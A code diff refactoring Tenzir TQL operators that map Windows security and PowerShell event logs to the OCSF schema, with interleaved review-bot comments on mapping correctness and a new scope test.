a/microsoft/operators/windows/ocsf/events/powershell_error.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_error.tql 
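Review bot: In the second hunk the raw package name is discarded right after the lookup (`drop $event.windows.EventData.PackageName`), so when `$protocols` misses and `auth_protocol_id` falls back to 99 the event retains neither a usable id nor the name that would explain it. The logon.tql and logon_failed.tql hunks in this same series keep that string in `auth_protocol`; doing the same here, `$event.ocsf.auth_protocol = move $event.windows.EventData.PackageName` in place of the `drop`, makes the mapping lossless and consistent across the three authentication mappers.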
@@ -1,41 +1,46 @@ --- description: PowerShell Engine Error (EID 4100) → OCSF Script Activity (1009, Execute/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure — this event fires on PS engine errors -ocsf.severity_id = 2 // Low — Windows Level 3 (Warning) -ocsf.status_code = (move windows.EventData.ErrorCode).string() -ocsf.status_detail = move windows.EventData.Message +$event.ocsf.status_id = 2 // Failure — this event fires on PS engine errors +$event.ocsf.severity_id = 2 // Low — Windows Level 3 (Warning) +$event.ocsf.status_code = (move $event.windows.EventData.ErrorCode).string() +$event.ocsf.status_detail = move $event.windows.EventData.Message // HostApplication is the full command line (exe + args), not just the path. -ocsf.actor = { +$event.ocsf.actor = { process: { - cmd_line: move windows.EventData.HostApplication, + cmd_line: move $event.windows.EventData.HostApplication, file: { type_id: 8 }, }, } // User is in "DOMAIN\username" format. -_user = (move windows.EventData.User).split("\\") -ocsf.actor.user = { +_user = (move $event.windows.EventData.User).split("\\") +$event.ocsf.actor.user = { domain: _user[0], name: _user[1], } drop _user -ocsf.script = { +$event.ocsf.script = { type_id: 2, // PowerShell - name: move windows.EventData.CommandInvocation, + name: move $event.windows.EventData.CommandInvocation, } // CommandLine (the full command attempted), HostVersion, EngineVersion, // RunspaceId, PipelineId, ScriptName, ShellId — left in unmapped. 
-drop windows.EventData.HostName -drop windows.EventData.ConnectedUser +drop $event.windows.EventData.HostName +drop $event.windows.EventData.ConnectedUser diff --git a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql index 0e773a1..4625346 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql @@ -1,18 +1,23 @@ --- description: PowerShell Module / Pipeline Logging (EID 4103) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 4 (Information). -ocsf.severity_id = 1 // Informational +$event.ocsf.severity_id = 1 // Informational -ocsf.script = { +$event.ocsf.script = { type_id: 2, // PowerShell } diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql index d7db994..6f81def 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql 
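Review bot: `name: _user[1]` in the powershell_error.tql hunk indexes the split result without the `?` guard that kerberos_service_ticket.tql uses for the same situation (`_parts[1]? else …`), so a `User` value with no backslash (a bare account name, or null after the `-` sentinel replacement done in map.tql) reaches an out-of-range index; I would expect that to surface as a warning with a null rather than a clean `actor.user`. Using only constructs already in the file: `domain: _user[0] if _user[1]? != null else null,` and `name: _user[1]? else _user[0],`. The task_lifecycle.tql and task_run.tql hunks build `actor.user` from `UserContext` with the identical unguarded `_user[0]`/`_user[1]` pair.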
@@ -1,32 +1,37 @@ --- description: PowerShell Script Block Logging (EID 4104) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 3 (Warning) when AMSI flags the block; Level 5 (Verbose) for // benign blocks. Map Level 3 → Low (2), everything else → Informational (1). -ocsf.severity_id = 2 if ocsf.metadata.log_level == "3" else 1 +$event.ocsf.severity_id = 2 if $event.ocsf.metadata.log_level == "3" else 1 -ocsf.script = { - uid: move windows.EventData.ScriptBlockId, +$event.ocsf.script = { + uid: move $event.windows.EventData.ScriptBlockId, type_id: 2, // PowerShell } // Path is the script file path when the block originates from a file; // empty string means an interactive/in-memory block. -if windows.EventData.Path? != null and windows.EventData.Path? != "" { - ocsf.script.file = { - path: move windows.EventData.Path, +if $event.windows.EventData.Path? != null and $event.windows.EventData.Path? != "" { + $event.ocsf.script.file = { + path: move $event.windows.EventData.Path, type_id: 1, // Regular file } - ocsf.script.file.name = ocsf.script.file.path.split("\\")[-1] - ocsf.script.name = ocsf.script.file.name + $event.ocsf.script.file.name = $event.ocsf.script.file.path.split("\\")[-1] + $event.ocsf.script.name = $event.ocsf.script.file.name } // ScriptBlockText is the raw script content and can be large. diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql index 9893d00..da14810 100644 
--- a/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block_invocation.tql @@ -2,27 +2,32 @@ description: > PowerShell Script Block Invocation Start/Stop (EID 4105/4106) → OCSF Script Activity (1009, Execute) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.script_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1009 -ocsf.activity_id = 1 // Execute -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1009 +$event.ocsf.activity_id = 1 // Execute +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // Windows Level 5 (Verbose). -ocsf.severity_id = 1 // Informational +$event.ocsf.severity_id = 1 // Informational // These events carry only correlation IDs; their value is linking back to the // matching 4104 script-block record via script.uid / actor.session.uid. -ocsf.script = { - uid: move windows.EventData.ScriptBlockId, +$event.ocsf.script = { + uid: move $event.windows.EventData.ScriptBlockId, type_id: 2, // PowerShell } -ocsf.actor = { +$event.ocsf.actor = { session: { - uid: move windows.EventData.RunspaceId, + uid: move $event.windows.EventData.RunspaceId, }, } diff --git a/microsoft/operators/windows/ocsf/events/process_create.tql b/microsoft/operators/windows/ocsf/events/process_create.tql index fd55b19..4747782 100644 --- a/microsoft/operators/windows/ocsf/events/process_create.tql +++ b/microsoft/operators/windows/ocsf/events/process_create.tql 
@@ -1,47 +1,52 @@ --- description: Process Creation (EID 4688) → OCSF Process Activity (1007, Launch) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.process_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1007 -ocsf.activity_id = 1 // Launch -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1007 +$event.ocsf.activity_id = 1 // Launch +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.launch_type_id = 1 // Spawn +$event.ocsf.launch_type_id = 1 // Spawn -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.process = { - pid: int(move windows.EventData.NewProcessId, base=16), - path: move windows.EventData.NewProcessName, - cmd_line: move windows.EventData.CommandLine, +$event.ocsf.process = { + pid: int(move $event.windows.EventData.NewProcessId, base=16), + path: move $event.windows.EventData.NewProcessName, + cmd_line: move $event.windows.EventData.CommandLine, file: { type_id: 8 }, parent_process: { - pid: int(move windows.EventData.ProcessId, base=16), - path: move windows.EventData.ParentProcessName, + pid: int(move $event.windows.EventData.ProcessId, base=16), + path: move $event.windows.EventData.ParentProcessName, file: { type_id: 8 }, }, } -ocsf.process.name = ocsf.process.path.split("\\")[-1] -ocsf.process.file.name = ocsf.process.name -ocsf.process.file.path = ocsf.process.path -ocsf.process.parent_process.name = ocsf.process.parent_process.path.split("\\")[-1] 
-ocsf.process.parent_process.file.name = ocsf.process.parent_process.name -ocsf.process.parent_process.file.path = ocsf.process.parent_process.path +$event.ocsf.process.name = $event.ocsf.process.path.split("\\")[-1] +$event.ocsf.process.file.name = $event.ocsf.process.name +$event.ocsf.process.file.path = $event.ocsf.process.path +$event.ocsf.process.parent_process.name = $event.ocsf.process.parent_process.path.split("\\")[-1] +$event.ocsf.process.parent_process.file.name = $event.ocsf.process.parent_process.name +$event.ocsf.process.parent_process.file.path = $event.ocsf.process.parent_process.path // EID 4688 only fires on success. -ocsf.status_id = 1 +$event.ocsf.status_id = 1 // TargetUserSid/Name/Domain are the impersonation target (usually null after // sentinel replacement). TokenElevationType and MandatoryLabel have no OCSF home. diff --git a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql index 9c6c4f0..c584bcd 100644 --- a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql +++ b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql 
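Review bot: `cmd_line: move $event.windows.EventData.CommandLine` deserves a comment, because on EID 4688 that field is only populated when the "Include command line in process creation events" audit policy is enabled; a null `process.cmd_line` is then a collection gap rather than a mapping bug, and detection content keyed on it needs to know that. I would add above the record: `// CommandLine is only present when the "Include command line in process creation events" policy is on; expect null on hosts without it.` The trailing comment about TargetUserSid/TokenElevationType continues outside the hunk.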
@@ -1,31 +1,36 @@ --- description: Scheduled Task Created (EID 4698) → OCSF Scheduled Job Activity (1006, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // The process that made the Task Scheduler RPC call. -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, process: { - pid: int(move windows.EventData.ClientProcessId, base=16), + pid: int(move $event.windows.EventData.ClientProcessId, base=16), }, } -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // TaskContent is an XML string describing triggers and actions. It is diff --git a/microsoft/operators/windows/ocsf/events/service_crashed.tql b/microsoft/operators/windows/ocsf/events/service_crashed.tql index 9b39186..f9d817a 100644 --- a/microsoft/operators/windows/ocsf/events/service_crashed.tql +++ b/microsoft/operators/windows/ocsf/events/service_crashed.tql 
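Review bot: `pid: int(move $event.windows.EventData.ClientProcessId, base=16)` parses the PID as hexadecimal, but on EID 4698 ClientProcessId is, as far as I recall, logged as a plain decimal; the `0x`-prefixed hex form is what EID 4688 uses for NewProcessId/ProcessId, where `base=16` in process_create.tql is correct. If that holds, a logged value of 3892 would decode here as 14482 and no longer join to the right process. Worth checking against a real 4698 record before this lands; the decimal form would be `pid: int(move $event.windows.EventData.ClientProcessId),`, matching what task_run.tql already does for its decimal ProcessId.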
@@ -1,19 +1,24 @@ --- description: Service Crashed Unexpectedly (EID 7034) → OCSF Windows Service Activity (201004, Stop/Failure) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 4 // Stop -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 4 // Stop +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.status_id = 2 // Failure -ocsf.severity_id = 3 // Medium — unexpected crash warrants elevated severity +$event.ocsf.status_id = 2 // Failure +$event.ocsf.severity_id = 3 // Medium — unexpected crash warrants elevated severity -ocsf.win_service = { - name: move windows.EventData.param1, +$event.ocsf.win_service = { + name: move $event.windows.EventData.param1, } // param2 = number of times the service has terminated unexpectedly; left in diff --git a/microsoft/operators/windows/ocsf/events/service_install.tql b/microsoft/operators/windows/ocsf/events/service_install.tql index a4d9f4b..c52296a 100644 --- a/microsoft/operators/windows/ocsf/events/service_install.tql +++ b/microsoft/operators/windows/ocsf/events/service_install.tql 
@@ -1,35 +1,40 @@ --- description: Service Installed via Security Audit (EID 4697) → OCSF Windows Service Activity (201004, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.actor = { +$event.ocsf.actor = { user: { - uid: move windows.EventData.SubjectUserSid, - name: move windows.EventData.SubjectUserName, - domain: move windows.EventData.SubjectDomainName, + uid: move $event.windows.EventData.SubjectUserSid, + name: move $event.windows.EventData.SubjectUserName, + domain: move $event.windows.EventData.SubjectDomainName, }, session: { - uid_alt: move windows.EventData.SubjectLogonId, + uid_alt: move $event.windows.EventData.SubjectLogonId, }, } -ocsf.win_service = { - name: move windows.EventData.ServiceName, +$event.ocsf.win_service = { + name: move $event.windows.EventData.ServiceName, service_file: { - path: move windows.EventData.ServiceFileName, + path: move $event.windows.EventData.ServiceFileName, type_id: 8, }, } // Strip quotes and arguments: "C:\path\svc.exe" --args → svc.exe -ocsf.win_service.service_file.name = ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") -ocsf.win_service.service_start_name = move windows.EventData.ServiceAccount +$event.ocsf.win_service.service_file.name = $event.ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") +$event.ocsf.win_service.service_start_name = move $event.windows.EventData.ServiceAccount // ServiceType (hex, e.g. "0x10") and ServiceStartType (integer, e.g. "2") are // left in unmapped — OCSF win_service enums exist but differ in encoding from 
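Review bot: `service_file.path` is assigned the raw `ServiceFileName`, which on EID 4697 carries the surrounding quotes and any arguments (the comment below the record shows `"C:\path\svc.exe" --args`), so the OCSF `path` field ends up holding a command line rather than a path while only `name` is cleaned. Since the argument string is precisely what a defender wants to look at on a new-service event, I would make that choice explicit with `// path keeps the raw ServiceFileName (quotes and arguments included); only name is normalised.` or, if a clean path is preferred, derive it the same way `name` is and leave the full string in unmapped. The service_install_scm.tql hunk has the identical construction on `ImagePath`, and the `name` expression is duplicated verbatim between the two files.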
diff --git a/microsoft/operators/windows/ocsf/events/service_install_scm.tql b/microsoft/operators/windows/ocsf/events/service_install_scm.tql index d1f1207..d5442bf 100644 --- a/microsoft/operators/windows/ocsf/events/service_install_scm.tql +++ b/microsoft/operators/windows/ocsf/events/service_install_scm.tql @@ -1,25 +1,30 @@ --- description: New Service Installed via SCM (EID 7045) → OCSF Windows Service Activity (201004, Create) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.windows_service_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 201004 -ocsf.activity_id = 1 // Create -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 201004 +$event.ocsf.activity_id = 1 // Create +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.win_service = { - name: move windows.EventData.ServiceName, +$event.ocsf.win_service = { + name: move $event.windows.EventData.ServiceName, service_file: { - path: move windows.EventData.ImagePath, + path: move $event.windows.EventData.ImagePath, type_id: 8, }, // service_start_name is the Windows account the service runs as (e.g. LocalSystem). - service_start_name: move windows.EventData.AccountName, + service_start_name: move $event.windows.EventData.AccountName, } // Strip quotes and arguments: "C:\path\svc.exe" --args → svc.exe -ocsf.win_service.service_file.name = ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") +$event.ocsf.win_service.service_file.name = $event.ocsf.win_service.service_file.path.split("\\")[-1].split(" ")[0].replace("\"", "") // ServiceType and StartType are descriptive strings on this event (e.g. // "Own Process", "Auto Start"); numeric enums are on EID 4697. Leave them in diff --git a/microsoft/operators/windows/ocsf/events/task_lifecycle.tql b/microsoft/operators/windows/ocsf/events/task_lifecycle.tql index 34b5e21..49b9cba 100644 
--- a/microsoft/operators/windows/ocsf/events/task_lifecycle.tql +++ b/microsoft/operators/windows/ocsf/events/task_lifecycle.tql @@ -2,28 +2,33 @@ description: > Task Scheduler Lifecycle (EID 106 Register, 140 Update, 141 Delete) → OCSF Scheduled Job Activity (1006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 let $activities = { "106": 1, // Create "140": 2, // Update "141": 3, // Delete } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // UserContext is "DOMAIN\username" format. -_user = (move windows.EventData.UserContext).split("\\") -ocsf.actor = { +_user = (move $event.windows.EventData.UserContext).split("\\") +$event.ocsf.actor = { user: { domain: _user[0], name: _user[1], diff --git a/microsoft/operators/windows/ocsf/events/task_run.tql b/microsoft/operators/windows/ocsf/events/task_run.tql index 8d4dcf7..0b0c1cc 100644 --- a/microsoft/operators/windows/ocsf/events/task_run.tql +++ b/microsoft/operators/windows/ocsf/events/task_run.tql @@ -3,12 +3,17 @@ description: > Task Scheduler Execution (EID 100 Start, 101 Failure, 102 Complete, 129 Process Launch, 200 Action Start, 201 Action Complete) → OCSF Scheduled Job Activity (1006) +args: + named: + - name: event + description: The working event to map. + type: field --- @name = "ocsf.scheduled_job_activity" -ocsf.category_uid = 1 -ocsf.class_uid = 1006 +$event.ocsf.category_uid = 1 +$event.ocsf.class_uid = 1006 let $activities = { "100": 6, // Start 
@@ -18,39 +23,39 @@ let $activities = { "200": 6, // Start (action started) "201": 99, // Other — OCSF 1006 has no Stop activity } -ocsf.activity_id = $activities[ocsf.metadata.event_code]? else 99 -ocsf.type_uid = ocsf.class_uid * 100 + ocsf.activity_id +$event.ocsf.activity_id = $activities[$event.ocsf.metadata.event_code]? else 99 +$event.ocsf.type_uid = $event.ocsf.class_uid * 100 + $event.ocsf.activity_id // EID 101 fires on launch failure (Windows Level 2 = Error). -if ocsf.metadata.event_code == "101" { - ocsf.status_id = 2 // Failure - ocsf.severity_id = 3 // Medium +if $event.ocsf.metadata.event_code == "101" { + $event.ocsf.status_id = 2 // Failure + $event.ocsf.severity_id = 3 // Medium } // EIDs 102 and 201 carry a ResultCode; non-zero means failure. -if windows.EventData.has("ResultCode") { - ocsf.status_id = 1 if windows.EventData.ResultCode == 0 else 2 - ocsf.status_code = (move windows.EventData.ResultCode).string() +if $event.windows.EventData.has("ResultCode") { + $event.ocsf.status_id = 1 if $event.windows.EventData.ResultCode == 0 else 2 + $event.ocsf.status_code = (move $event.windows.EventData.ResultCode).string() } -ocsf.job = { - name: move windows.EventData.TaskName, +$event.ocsf.job = { + name: move $event.windows.EventData.TaskName, } // InstanceId/TaskInstanceId has no OCSF job field; leave in unmapped. // ActionName is the executable path for EIDs 200/201. -if windows.EventData.has("ActionName") { - ocsf.job.file = { - path: move windows.EventData.ActionName, +if $event.windows.EventData.has("ActionName") { + $event.ocsf.job.file = { + path: move $event.windows.EventData.ActionName, type_id: 1, // Regular file } - ocsf.job.file.name = ocsf.job.file.path.split("\\")[-1] + $event.ocsf.job.file.name = $event.ocsf.job.file.path.split("\\")[-1] } // UserContext present on EID 100. 
-if windows.EventData.has("UserContext") { - _user = (move windows.EventData.UserContext).split("\\") - ocsf.actor = { +if $event.windows.EventData.has("UserContext") { + _user = (move $event.windows.EventData.UserContext).split("\\") + $event.ocsf.actor = { user: { domain: _user[0], name: _user[1], @@ -60,8 +65,8 @@ if windows.EventData.has("UserContext") { } // ProcessId (EID 129) or EnginePID (EIDs 200/201). -if windows.EventData.has("ProcessId") { - ocsf.actor.process = { pid: int(move windows.EventData.ProcessId) } -} else if windows.EventData.has("EnginePID") { - ocsf.actor.process = { pid: int(move windows.EventData.EnginePID) } +if $event.windows.EventData.has("ProcessId") { + $event.ocsf.actor.process = { pid: int(move $event.windows.EventData.ProcessId) } +} else if $event.windows.EventData.has("EnginePID") { + $event.ocsf.actor.process = { pid: int(move $event.windows.EventData.EnginePID) } } diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 0014aeb..7261389 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql 
@@ -7,143 +7,141 @@ args: type: field --- -windows = $event -ocsf = {} +$event = {...$event, windows: $event, ocsf: {}} -ocsf.metadata = { - event_code: windows.System.EventID.string(), +$event.ocsf.metadata = { + event_code: $event.windows.System.EventID.string(), extensions: [{name: "win"}], log_format: "xml", - log_name: move windows.System.Channel, - log_level: (move windows.System.Level).string(), - log_version: (move windows.System.Version).string(), - logged_time: move windows.System.TimeCreated.SystemTime, - original_event_uid: (move windows.System.EventRecordID).string(), + log_name: move $event.windows.System.Channel, + log_level: (move $event.windows.System.Level).string(), + log_version: (move $event.windows.System.Version).string(), + logged_time: move $event.windows.System.TimeCreated.SystemTime, + original_event_uid: (move $event.windows.System.EventRecordID).string(), processed_time: now(), product: { - name: move windows.System.Provider.Name, - uid: move windows.System.Provider.Guid?, + name: move $event.windows.System.Provider.Name, + uid: move $event.windows.System.Provider.Guid?, vendor_name: "Microsoft", }, profiles: ["host"], version: "1.8.0", } -windows.System.EventID = windows.System.EventID.int() -drop windows.System.Provider -drop windows.System.TimeCreated +$event.windows.System.EventID = $event.windows.System.EventID.int() +drop $event.windows.System.Provider +drop $event.windows.System.TimeCreated -ocsf.severity_id = 1 +$event.ocsf.severity_id = 1 // Native Windows events have only one timestamp (SystemTime); copy it to time. -ocsf.time = ocsf.metadata.logged_time +$event.ocsf.time = $event.ocsf.metadata.logged_time -ocsf.device = { - hostname: move windows.System.Computer, +$event.ocsf.device = { + hostname: move $event.windows.System.Computer, } // "-" is the universal Windows sentinel for "not applicable/empty". 
replace what="-", with=null -match windows.System.EventID { +match $event.windows.System.EventID { 99..103 | 129 | 199..202 => { - microsoft::windows::ocsf::events::task_run + microsoft::windows::ocsf::events::task_run event=$event } 106 | 139..142 => { - microsoft::windows::ocsf::events::task_lifecycle + microsoft::windows::ocsf::events::task_lifecycle event=$event } 1000 => { - microsoft::windows::ocsf::events::application_error + microsoft::windows::ocsf::events::application_error event=$event } 1001 => { - microsoft::windows::ocsf::events::application_crash_report + microsoft::windows::ocsf::events::application_crash_report event=$event } 1002 => { - microsoft::windows::ocsf::events::application_hang + microsoft::windows::ocsf::events::application_hang event=$event } 1005..1008 => { - microsoft::windows::ocsf::events::defender_threat + microsoft::windows::ocsf::events::defender_threat event=$event } 1102 => { - microsoft::windows::ocsf::events::eventlog_clear + microsoft::windows::ocsf::events::eventlog_clear event=$event } 1115..1118 => { - microsoft::windows::ocsf::events::defender_detection + microsoft::windows::ocsf::events::defender_detection event=$event } 1121 => { - microsoft::windows::ocsf::events::defender_asr + microsoft::windows::ocsf::events::defender_asr event=$event } 2000 => { - microsoft::windows::ocsf::events::defender_signature_update + microsoft::windows::ocsf::events::defender_signature_update event=$event } 4100 => { - microsoft::windows::ocsf::events::powershell_error + microsoft::windows::ocsf::events::powershell_error event=$event } 4103 => { - microsoft::windows::ocsf::events::powershell_module_logging + microsoft::windows::ocsf::events::powershell_module_logging event=$event } 4104 => { - microsoft::windows::ocsf::events::powershell_script_block + microsoft::windows::ocsf::events::powershell_script_block event=$event } 4104..4107 => { - microsoft::windows::ocsf::events::powershell_script_block_invocation + 
microsoft::windows::ocsf::events::powershell_script_block_invocation event=$event } 4624 => { - microsoft::windows::ocsf::events::logon + microsoft::windows::ocsf::events::logon event=$event } 4625 => { - microsoft::windows::ocsf::events::logon_failed + microsoft::windows::ocsf::events::logon_failed event=$event } 4648 => { - microsoft::windows::ocsf::events::explicit_credential_logon + microsoft::windows::ocsf::events::explicit_credential_logon event=$event } 4672 => { - microsoft::windows::ocsf::events::authorize_session + microsoft::windows::ocsf::events::authorize_session event=$event } 4688 => { - microsoft::windows::ocsf::events::process_create + microsoft::windows::ocsf::events::process_create event=$event } 4697 => { - microsoft::windows::ocsf::events::service_install + microsoft::windows::ocsf::events::service_install event=$event } 4698 => { - microsoft::windows::ocsf::events::scheduled_task_create + microsoft::windows::ocsf::events::scheduled_task_create event=$event } 4720 | 4721..4727 => { - microsoft::windows::ocsf::events::account_change + microsoft::windows::ocsf::events::account_change event=$event } 4726..4735 | 4753..4759 => { - microsoft::windows::ocsf::events::group_management + microsoft::windows::ocsf::events::group_management event=$event } 4769 => { - microsoft::windows::ocsf::events::kerberos_service_ticket + microsoft::windows::ocsf::events::kerberos_service_ticket event=$event } 4771 => { - microsoft::windows::ocsf::events::kerberos_preauth_failed + microsoft::windows::ocsf::events::kerberos_preauth_failed event=$event } 4776 => { - microsoft::windows::ocsf::events::ntlm_auth + microsoft::windows::ocsf::events::ntlm_auth event=$event } 5001 | 5007 => { - microsoft::windows::ocsf::events::defender_tamper + microsoft::windows::ocsf::events::defender_tamper event=$event } 6005 => { - microsoft::windows::ocsf::events::eventlog_start + microsoft::windows::ocsf::events::eventlog_start event=$event } 6006 => { - 
microsoft::windows::ocsf::events::eventlog_stop + microsoft::windows::ocsf::events::eventlog_stop event=$event } 7034 => { - microsoft::windows::ocsf::events::service_crashed + microsoft::windows::ocsf::events::service_crashed event=$event } 7045 => { - microsoft::windows::ocsf::events::service_install_scm + microsoft::windows::ocsf::events::service_install_scm event=$event } _ => { - microsoft::windows::ocsf::base + microsoft::windows::ocsf::base event=$event } } -drop windows.System.EventID +drop $event.windows.System.EventID -$event = {...ocsf, unmapped: windows} -drop windows, ocsf +$event = {...$event.ocsf, unmapped: $event.windows} diff --git a/microsoft/tests/asim/scope.tql b/microsoft/tests/asim/scope.tql new file mode 100644 index 0000000..9399fc5 --- /dev/null +++ b/microsoft/tests/asim/scope.tql @@ -0,0 +1,32 @@ +from { + outer: "keep", + ocsf: "outer-ocsf", + asim: { + Outer: "keep-asim", + }, + payload: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2024-03-23T12:34:56Z, + severity_id: 1, + status: "Success", + metadata: { + product: { + name: "Windows", + vendor_name: "Microsoft", + }, + }, + user: { + name: "alice", + }, + device: { + hostname: "WINHOST01", + }, + }, +} +microsoft::asim::map event=payload diff --git a/microsoft/tests/asim/scope.txt b/microsoft/tests/asim/scope.txt new file mode 100644 index 0000000..2c99edc --- /dev/null +++ b/microsoft/tests/asim/scope.txt 
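Review bot: `replace what="-", with=null` (the context line between the device block and the `match`) is not scoped to `$event`: as far as I can tell `replace` walks the whole record, so once callers pass a nested selector such as `event=payload` it also rewrites `"-"` strings in the outer fields that the new scope-windows test expects to survive. That test uses `"outer-windows"`/`"outer-ocsf"` sentinels, so it cannot observe this; setting one outer field to `"-"` in scope-windows.tql would pin the intended behaviour either way. If `replace` cannot be scoped, the sentinel substitution may have to move into the per-event operators, or the limitation should be stated on the `event` argument's description. Also visible in the hunk (pre-existing, not introduced here): the `4104` and `4104..4107` arms and the `4720 | 4721..4727` and `4726..4735` arms overlap, so dispatch for 4104, 4726 and 4727 depends on arm order and a comment stating that intent would help.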
@@ -0,0 +1,38 @@
+{
+ outer: "keep",
+ ocsf: "outer-ocsf",
+ asim: {
+ Outer: "keep-asim",
+ },
+ payload: {
+ EventCount: 1,
+ EventStartTime: 2024-03-23T12:34:56Z,
